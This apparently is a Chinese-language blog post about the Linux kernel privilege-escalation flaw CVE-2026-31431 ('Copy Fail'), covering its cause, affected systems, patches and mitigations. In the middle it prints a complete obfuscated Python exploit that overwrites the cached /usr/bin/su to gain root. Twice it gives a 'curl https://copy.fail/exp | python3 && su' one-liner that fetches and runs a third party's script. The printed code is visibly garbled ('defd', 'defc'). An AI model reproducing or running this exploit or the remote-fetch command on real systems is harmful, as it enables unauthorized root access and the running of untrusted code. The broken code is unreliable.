从事网络安全有10年了,见过核弹级的漏洞不多,
而4月29日,安全研究机构Theori公开披露Linux内核潜伏近十年的高危本地提权漏洞Copy Fail(CVE-2026-31431),
堪称超级核弹头了。
漏洞源自2017年一次内核优化,影响2017年至今几乎所有主流Linux发行版,攻击者仅凭一段732字节Python脚本,即可从普通用户直接拿到root权限,还能实现容器逃逸、突破云租户隔离,危害等级拉满。
01、漏洞核心速览
漏洞编号:CVE-2026-31431
漏洞名称:Copy Fail
披露时间:2026-04-29
危害等级:高危(CVSS 7.8)
漏洞位置:内核crypto子系统algif_aead模块
根因:2017年commit 72548b093ee3 错误原地优化
修复:主线commit a664bf3d603d
利用难度:极低,无竞态、无偏移、无需复杂环境
一句话看懂:普通用户通过AF_ALG套接字+splice(),可向内核page cache写入4个可控字节,篡改su等系统文件,直接秒变root。
02、为什么说它“史诗级”危险?
1. 利用超简单
732字节Python脚本一键执行,无需调试、无需网络、无需碰运气,直线型攻击,成功率接近100%。
1、Linux高危漏洞Copy Fail - CVE-2026-31431漏洞利用POC:
#!/usr/bin/env python3
import os as g,zlib,socket as s
defd(x):return bytes.fromhex(x)
defc(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
2、实验GitHub大佬写好的exp脚本:
https://github.com/theori-io/copy-fail-CVE-2026-31431
img3、使用外站,别的师傅部署好的一键化利用脚本,一句话命令root提权:
curl https://copy.fail/exp | python3 && su
成功则立即获得root shell
2. 隐身能力极强
写入不标记脏页,绕过文件完整性校验,杀毒、审计工具很难发现内存里的篡改。
3. 全局穿透
page cache系统共享,改一处、全机生效;容器与宿主机共享缓存,从容器直穿宿主机。
4. 潜伏近十年
2017年引入,9年未被发现,海量服务器、云节点、容器集群全在射程内。
03、谁在危险区?(受影响范围)
已实测中招
- Ubuntu 24.04 LTS
- Amazon Linux 2023
- RHEL 14.3
- SUSE 16
理论全中招
Debian、Arch、Fedora、Rocky、AlmaLinux、Oracle Linux及大量嵌入式/定制Linux。
内核版本
- 受影响:4.14 ~ 未修复版本
- 已修复:6.18.22+、6.19.12+、7.0+
⚠️ 上游修复≠发行版已推送,务必核对自身系统。
04、最慌的场景:容器/云/CI/CD危!
05、立刻行动:修复+缓解方案
1. 首选:升级内核(最安全)
更新到包含修复commit a664bf3d603d 的版本:
- Ubuntu/Debian:更新 linux-image
- RHEL/CentOS/Rocky/Alma:等待红帽官方补丁
- Amazon Linux:关注AWS安全公告
2. 临时缓解(不能重启时)
禁用algif_aead模块,阻断利用链:
bash
# 临时卸载
sudo rmmod algif_aead
# 永久黑名单
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf
⚠️ 可能影响部分VPN、TLS库,业务不依赖AEAD再用。
3. 自查是否受影响
bash
# 查看模块是否加载
lsmod | grep algif_aead
有输出=处于风险中。
4. 验证POC(仅授权测试环境)
bash
curl https://copy.fail/exp | python3 && su
成功直接弹出root shell。
06、不同角色安全建议
系统管理员:优先排查多用户、容器、CI/CD主机,尽快补丁
K8s/云运维:宿主机内核全量升级,限制容器内AF_ALG调用
应用开发者:低权限环境不跑不可信代码,Runner用沙箱
安全团队:更新规则,监控AF_ALG+splice()异常组合调用
07、总结
这是近年影响最广、利用最简单、隐蔽性最强的Linux内核提权漏洞之一:
- 732字节=Root
- 潜伏近10年
- 容器可逃逸
- 云租户隔离可破
五一假期前最后一道安全关,共享Linux环境请今晚就补丁/缓解,别给黑客留窗口!
POC地址:https://github.com/theori-io/copy-fail-CVE-2026-31431